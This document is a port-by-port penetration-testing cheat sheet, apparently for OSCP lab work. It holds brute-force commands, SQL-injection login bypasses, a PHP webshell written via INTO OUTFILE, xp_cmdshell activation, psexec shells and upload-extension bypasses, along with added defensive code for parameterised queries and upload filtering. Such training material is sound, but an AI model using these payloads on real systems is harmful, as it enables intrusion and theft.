OSCP
Network enum - Ports
A quick checklist for possible attack vectors through the different ports

TCP

21 - FTP

Checks

  • Check if you have anonymous access
  • Check if you can upload a file to trigger a webshell through the webapp
  • Check if you can download backup files to extract included passwords
  • Check the version of FTP for exploits

Commands

Login to ftp server (for anonymous access, use "anonymous":"anonymous")
    ftp $ip
FTP specific nmap scan
    nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip
Tip: Before starting scans, set a bash variable to the IP address you are scanning, like ip=10.11.1.1. Then the $ip value in the commands of this cheat sheet will be filled in automatically.

22 - SSH

Checks

  • Try easy username-password combinations
  • Check for username enumeration vulnerabilities
  • Check version for vulnerabilities
  • (Only when getting desperate) Try brute force with Hydra, Medusa, ...

Commands

Nmap scan
    nmap -p 22 -sV -Pn -T4 --script=ssh* $ip
Brute force
    hydra -v -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 $ip ssh
    hydra -l gibson -P /tmp/alpha.txt -T 20 $ip ssh
Connect through found key
    #make key only accessible by the current user
    chmod 0600 user.key
    ssh <username>@$ip -i user.key

25 - SMTP

Checks

  • Check for user enumeration
  • Check version for exploits

Commands

nmap scan
    nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip
user enumeration
    #manual way
    nc -nvv $ip 25
    VRFY root
    (exists if the server replies with a 250 line naming the user, e.g. "250 Georgia <...>")
    (doesn't exist if the server replies "551 user not local")

    #automated way
    smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip

80/443 - HTTP(S)

Checks
  • Login portals
    • try the default credentials of the application
    • try usernames already seen throughout the application or in other services like SMTP
    • try SQL injection bypasses
    • try registering a new user
    • brute force with hydra, medusa, ...
  • Check robots.txt for hidden directories
  • Brute force directories to find hidden content
  • Check for passwords/URLs/versions/... in comments of web app
  • Check version numbers for known exploits
    • Check changelog for version information
    • Estimate version based on copyright date (if not automatically adjusted)
  • Check if specific CMS is used like WordPress and then use platform specific scanners
  • ways to RCE
    • check for file upload functionalities (if uploads are filtered, try alternative extensions)
    • execute commands through SQLi
    • Shellshock
    • command injection
    • trigger injected code through path traversal
Enumeration scans
Directory brute force
    #start off with a general scan
    gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log -t 50
    #add extensions
    gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log -t 100 -x php,txt,cgi,sh,pl,py -s "200,204,301,302,307,403,500"
nmap scan
    nmap -sV -Pn --script=ssl-heartbleed,http-adobe-coldfusion-apsa1301.nse,http-apache-negotiation.nse,http-apache-server-status.nse,http-aspnet-debug.nse,http-auth-finder.nse,http-auth.nse,http-avaya-ipoffice-users.nse,http-awstatstotals-exec.nse,http-axis2-dir-traversal.nse,http-backup-finder.nse,http-barracuda-dir-traversal.nse,http-bigip-cookie.nse,http-brute.nse,http-cakephp-version.nse,http-cisco-anyconnect.nse,http-coldfusion-subzero.nse,http-comments-displayer.nse,http-config-backup.nse,http-cookie-flags.nse,http-cors.nse,http-cross-domain-policy.nse,http-csrf.nse,http-date.nse,http-default-accounts.nse,http-devframework.nse,http-dlink-backdoor.nse,http-dombased-xss.nse,http-domino-enum-passwords.nse,http-drupal-enum-users.nse,http-drupal-enum.nse,http-enum.nse,http-errors.nse,http-exif-spider.nse,http-feed.nse,http-fileupload-exploiter.nse,http-form-brute.nse,http-form-fuzzer.nse,http-frontpage-login.nse,http-git.nse,http-gitweb-projects-enum.nse,http-headers.nse,http-huawei-hg5xx-vuln.nse,http-iis-short-name-brute.nse,http-iis-webdav-vuln.nse,http-internal-ip-disclosure.nse,http-joomla-brute.nse,http-jsonp-detection.nse,http-litespeed-sourcecode-download.nse,http-ls.nse,http-majordomo2-dir-traversal.nse,http-mcmp.nse,http-method-tamper.nse,http-methods.nse,http-mobileversion-checker.nse,http-ntlm-info.nse,http-open-redirect.nse,http-passwd.nse,http-php-version.nse,http-phpmyadmin-dir-traversal.nse,http-phpself-xss.nse,http-proxy-brute.nse,http-put.nse,http-qnap-nas-info.nse,http-rfi-spider.nse,http-robots.txt.nse,http-security-headers.nse,http-server-header.nse,http-shellshock.nse,http-sitemap-generator.nse,http-sql-injection.nse,http-stored-xss.nse,http-svn-enum.nse,http-svn-info.nse,http-title.nse,http-tplink-dir-traversal.nse,http-trace.nse,http-traceroute.nse,http-trane-info.nse,http-unsafe-output-escaping.nse,http-useragent-tester.nse,http-userdir-enum.nse,http-vhosts.nse,http-vlcstreamer-ls.nse,http-vmware-path-vuln.nse,http-vuln-cve2006-3392.nse,http-vuln-cve2009-3960.nse,http-vuln-cve2010-0738.nse,http-vuln-cve2010-2861.nse,http-vuln-cve2011-3368.nse,http-vuln-cve2012-1823.nse,http-vuln-cve2013-0156.nse,http-vuln-cve2013-6786.nse,http-vuln-cve2013-7091.nse,http-vuln-cve2014-2126.nse,http-vuln-cve2014-2127.nse,http-vuln-cve2014-2128.nse,http-vuln-cve2014-3704.nse,http-vuln-cve2014-8877.nse,http-vuln-cve2015-1427.nse,http-vuln-cve2015-1635.nse,http-vuln-cve2017-1001000.nse,http-vuln-cve2017-5638.nse,http-vuln-cve2017-5689.nse,http-vuln-cve2017-8917.nse,http-vuln-misfortune-cookie.nse,http-vuln-wnr1000-creds.nse,http-waf-detect.nse,http-waf-fingerprint.nse,http-webdav-scan.nse,http-wordpress-brute.nse,http-wordpress-enum.nse,http-wordpress-users.nse,http-xssed.nse,membase-http-info.nse -p 80 $ip
webdav scanning
    davtest --url http://$ip
    davtest -move -sendbd auto -url http://$ip:8080/webdav/
    cadaver http://$ip:8080/webdav/
Nikto scans
    nikto -host $ip | tee nikto.log
Login portals
brute force login portals
    #basic auth
    hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path
    #login form
    hydra -L users.txt -P users.txt $ip http-post-form "<directory>:login_username=^USER^&secretkey=^PASS^&<rest of post request>:<error message>"
    #create custom password list
    cewl -w cewl_passlist.txt -d 5 10.11.1.39/otrs/index.pl
Standard credentials you should try when being blocked by login portal
    admin:admin
    admin:password
    admin:administrator
    admin:(name of box)
    user:user
    user:password
    user:12345
    guest:guest
    root:root
    (name of box):(name of box)
    (default account):(name of application)
Try SQL injections to bypass the login form
    ' or 1=1;--
    ' or '1'='1
    ' or 1=1;#
    ') or ('x'='x
    ' or <column> like '%';--
    ' or 1=1 LIMIT 1;--
    admin' --
    admin' #
    admin'/*
    ' or 1=1--
    ' or 1=1#
    ' or 1=1/*
    ') or '1'='1--
    ') or ('1'='1
    ' or 1/*
    */ =1 --
    admin' or 'a'='a
    '#
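Why the payloads above get past a login check, and how a parameterised query closes the hole, as an added example that is not part of the original cheat sheet. It uses an in-memory sqlite3 table with constructed sample users; the helper names are our own.

```python
# Added example: string-built login query beside its parameterised form.
# Sample users are constructed for the demo, not taken from any real system.
import sqlite3


def make_db():
    """Build a throwaway users table with constructed credentials."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "correct horse"), ("alice", "hunter2")])
    return con


def login_vulnerable(con, username, password):
    """Concatenates user input into the SQL text, so a quote in the input
    ends the string literal and the rest is parsed as SQL. With
    "' or 1=1--" the WHERE clause becomes (username = '' or 1=1) and the
    trailing "--" comments out the password check entirely."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = con.execute(sql).fetchone()
    return row[0] if row else None      # first matching user, or None


def login_safe(con, username, password):
    """Binds the input as parameters: the database receives the query shape
    and the values separately, so quotes and comment markers stay data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    con = make_db()
    for payload in ("' or 1=1--", "admin' --"):
        print(repr(payload),
              "vulnerable ->", login_vulnerable(con, payload, "x"),
              "| safe ->", login_safe(con, payload, "x"))
```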

File upload

Try alternative extensions for file uploads
    php - try case variants (pHp, phP) and double extensions (test.php.jpg)
    php - .phtml, .php, .php3, .php4, .php5, .inc
    asp - .asp, .aspx
    perl - .pl, .pm, .cgi, .lib
    jsp - .jsp, .jspx, .jsw, .jsv, .jspf
    coldfusion - .cfm, .cfml, .cfc, .dbm
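As an added example (not from the original cheat sheet), a naive upload filter beside a hardened one, checked against the extension tricks listed above; the function names and the allowlist are our own assumptions.

```python
# Added example: why a blocklist on the last extension is bypassed by the
# variants above, and an allowlist check that is not. Names are our own.

# Extensions that common server-side handlers may execute (from the list above)
DANGEROUS = {
    "php", "phtml", "php3", "php4", "php5", "inc",
    "asp", "aspx", "pl", "pm", "cgi", "lib",
    "jsp", "jspx", "jsw", "jsv", "jspf",
    "cfm", "cfml", "cfc", "dbm",
}
# Assumed allowlist for an image/document upload feature
ALLOWED = {"jpg", "jpeg", "png", "gif", "pdf"}


def naive_allowed(filename):
    """Case-sensitive blocklist on the final extension only.
    Bypassed by shell.pHp, test.php.jpg and shell.phtml."""
    ext = filename.rsplit(".", 1)[-1] if "." in filename else ""
    return ext not in {"php"}


def hardened_allowed(filename):
    """Reject path components, dotfiles and missing extensions; lower-case
    the name; refuse any executable extension anywhere in it; then require
    the last extension to be on the allowlist."""
    if not filename or "/" in filename or "\\" in filename or "\x00" in filename:
        return False            # no path parts, no NUL-byte tricks
    parts = filename.lower().split(".")
    if len(parts) < 2 or parts[0] == "":
        return False            # no extension, or a dotfile such as .htaccess
    exts = parts[1:]
    if any(e in DANGEROUS for e in exts):
        return False            # catches test.php.jpg, shell.phtml, x.pHp, shell.php.
    return exts[-1] in ALLOWED


if __name__ == "__main__":
    for name in ("shell.php", "shell.pHp", "test.php.jpg", "shell.phtml", "photo.JPG"):
        print(f"{name:14} naive={naive_allowed(name)!s:5} hardened={hardened_allowed(name)}")
```

Extension checks alone are not sufficient: uploads should also be stored outside the web root under a server-generated name.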

File traversal list

Path Traversal Cheat Sheet: Windows | GracefulSecurity

RCE through SQLi

    #Through file creation
    union all select "<?php echo shell_exec($_GET['cmd']);?>",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php'
    #if running as database admin, use xp_cmdshell
    http://www.example.com/news.asp?id=1; exec master.dbo.xp_cmdshell 'command'
    '; exec master.dbo.xp_cmdshell 'command'

    #On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
    EXEC sp_configure 'show advanced options', 1;--
    RECONFIGURE;--
    EXEC sp_configure 'xp_cmdshell', 1;--
    RECONFIGURE;--

    #On MSSQL 2000:
    EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll';--
If you use exploits for web apps and they don't work as expected, proxy the traffic through Burp and inspect the requests that are actually sent.

110 - POP3

Checks
  • Check version for exploits
  • Check mails for the presence of credentials
Commands
manually login to the application
    #connect and check for banner
    telnet $ip 110
    #guess login credentials
    USER pelle
    PASS admin
    #list all emails
    list
    #retrieve email number 5 for example
    retr 5

111 - NFS/RPC

Checks
  • Check for passwords in files on mountable drives
Commands
    #check general rpc info
    rpcinfo $ip

    #Check what shares you can mount
    showmount -e $ip

    #mounting the share
    #make the directory
    mkdir /mnt/share
    #mount the share
    mount -t nfs -o nolock $ip:/share /mnt/share
Keep mountable shares in mind: exports that do not squash root (no_root_squash) can be used in root squashing attacks to elevate your privileges to root.

139/445 - SMB

Checks
  • Check for null sessions
  • Check the permissions of users you already have
  • Check for passwords in files
  • Attempt brute force on enumerated users
  • Check for EternalBlue
  • Check samba version (if Linux)
Commands (Automated)
nmap scan
    #general scan
    nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse $ip -p 445

    #vulnerability scan
    nmap --script smb-vuln* -p 445 -oA nmap_smb_vulns $ip
Check samba versions
    #save the script below as samba_version.sh and make it executable, then run:
    ./samba_version.sh RHOST [RPORT]

    #!/bin/bash
    #print usage if no host was given, otherwise take host and optional port (default 139)
    if [ -z "$1" ]; then echo "Usage: ./samba_version.sh RHOST {RPORT}"; exit 1; else rhost="$1"; fi
    if [ -n "$2" ]; then rport="$2"; else rport=139; fi
    #sniff the SMB negotiation on the VPN interface (tap0) in the background and pull the Samba version string out of it
    tcpdump -s0 -n -i tap0 src "$rhost" and port "$rport" -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$"
    #trigger the negotiation by listing shares, then give tcpdump a moment to print
    echo "exit" | smbclient -L "$rhost" 1>/dev/null 2>/dev/null
    sleep 0.5 && echo ""
enum4linux
    enum4linux -a $ip
smbmap
    #list general folders
    smbmap -H $ip

    #recursively list dirs and files
    smbmap -R $sharename -H $ip
    smbmap -R "Users" -H $ip -u Guest

    #download a file
    smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q
CrackMapExec
    #check if you can connect through null sessions (check what rights you have on the shares)
    cme smb $ip -u '' -p '' --shares
    cme smb $ip -u '' -p '' --shares --port 139

    #enumerate the users
    #rid brute forcing
    cme smb $ip -u "" -p "" --rid-brute
    #active sessions
    cme smb $ip -u '' -p '' --loggedon-users
    #users in general
    cme smb $ip -u '' -p '' --users

    #enumerate the groups
    #local groups
    cme smb $ip -u '' -p '' --local-groups
    #domain groups
    cme smb $ip -u '' -p '' --groups

    #check for the password policy
    cme smb $ip -u "" -p "" --pass-pol
mount shares and inspect files manually
    #smbclient
    smbclient -L $ip
    smbclient //$ip/tmp
    smbclient '\\192.168.1.105\ipc$' -U john
    smbclient //$ip/ipc$ -U john

    #mounting the share (quote the UNC path so the shell does not strip the backslashes)
    mkdir /mnt/targetshare
    mount -t cifs '//172.16.20.88/ipc$' -o username=[username] /mnt/targetshare
brute force smb
    hydra -l Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt $ip smb -V -f
    #in OSCP the passwords are often equal to the username
    hydra -L usernames.txt -P usernames.txt $ip smb -V -f
Gaining shell through psexec (user needs to be admin)
    #copy script
    cp /usr/share/doc/python-impacket/examples/psexec.py .

    #specific command test
    python psexec.py <username>:<pass>@10.11.1.227 whoami

    #shell
    rlwrap python psexec.py <username>:<pass>@10.11.1.227

    #NOTE: be careful with exclamation marks in passwords: escape them as \! so the shell does not expand them

    #through crackmapexec (didn't always work for me)
    cme smb 10.11.1.227 -u "backup" -p "backup" -x whoami

1433 - MSSQL

Checks
  • Try default credentials "sa:password"
  • Brute force creds
  • Check database content for new passwords
  • Check version for exploits
  • RCE
    • through xp_cmdshell functionality
    • through injecting payload in output file, placing it in webroot and triggering it through webapp
Commands
nmap
    nmap -p 1433 --script='banner,(ms-sql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)' $ip -oN 1433_nmap_mssql
credential brute force
    nmap -p 1433 --script ms-sql-brute --script-args passdb=/usr/share/seclists/Passwords/darkweb2017-top1000.txt $ip
manually logging in and gaining shell
    #login
    sqsh -S $ip -U sa -P password
    sqsh -S $ip:27900 -U sa -P password

    #execute commands
    xp_cmdshell 'date'
    go

3306 - MySQL

Checks
  • Try default credentials "root":""
  • Brute force credentials
  • Check database content for new passwords
  • Check version for exploits
Commands
nmap
    nmap -sV -Pn --script=mysql-audit.nse,mysql-brute.nse,mysql-databases.nse,mysql-dump-hashes.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-query.nse,mysql-users.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p 3306 -oN 3306_nmap_mysql $ip
try default password
    mysql --host=$ip -u root -p

3389 - RDP

Checks
  • Check if you can login with default guest account and blank password
  • Check if you can brute force users
  • Check for BlueKeep
Commands
nmap
    nmap -p 3389 --script=rdp-enum-encryption,rdp-vuln-ms12-020 $ip -oN 3389_nmap_rdp
manually login
    rdesktop $ip

    #Try default guest account "guest":""
    rdesktop -u guest $ip -g 94%
Start brute force
    ncrack -vv --user Administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
    ncrack -vv --user Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt rdp://$ip

5900 - VNC

Checks
  • check for easy VNC passwords
  • check for exploits for VNC version
  • brute force VNC password
Commands
nmap
    nmap -sV -Pn -p 5900 --script=vnc-info,vnc-title,realvnc-auth-bypass $ip -oA 5900_nmap_VNC
VNC brute force on base password
    hydra -s 5900 -P /usr/share/seclists/Passwords/darkweb2017-top10.txt -t 30 $ip vnc

UDP

53 - DNS

Checks
  • Try zone transfer
  • Brute force subdomains
Commands
do DNS lookup specifying the DNS server
    nslookup
    #set nameserver to ip of box
    > server 10.10.10.13
    #ask for dns of box ip address
    > 10.10.10.13
subdomain enumeration / brute force
    dig axfr @$ip test.htb
    fierce -dns ext.recon.lan -dnsserver 172.16.90.53
    gobuster dns -d ext.recon.lan -r 172.16.90.53 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

69 - TFTP

Checks
  • search for files to find sensitive info like passwords
  • upload shells to trigger them in web app
Commands
nmap
    nmap -sU -p 69 --script tftp-enum.nse $ip
Interact with TFTP protocol
    #setup the connection
    tftp 172.16.200.100
    #get a file
    tftp> get /etc/passwd
    #upload reverse shell
    tftp> put shell.php
automated search sensitive files (Metasploit)
    msfconsole
    use auxiliary/scanner/tftp/tftpbrute
    set RHOSTS $ip
    set DICTIONARY /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt
    run

161 - SNMP

Checks
  • Try the default community strings 'public' and 'private'
  • Enumerate version of OS/ users /processes
Commands
nmap
    nmap -sU -p161 --script "snmp-*" $ip
scan range of ip addresses for snmp strings
    #only try "public" and "private"
    onesixtyone -i targets.list

    #try 100+ community strings
    onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $ip
enumerate information with known community string
    # enumerate windows users
    snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25
    # enumerate running processes
    snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1.2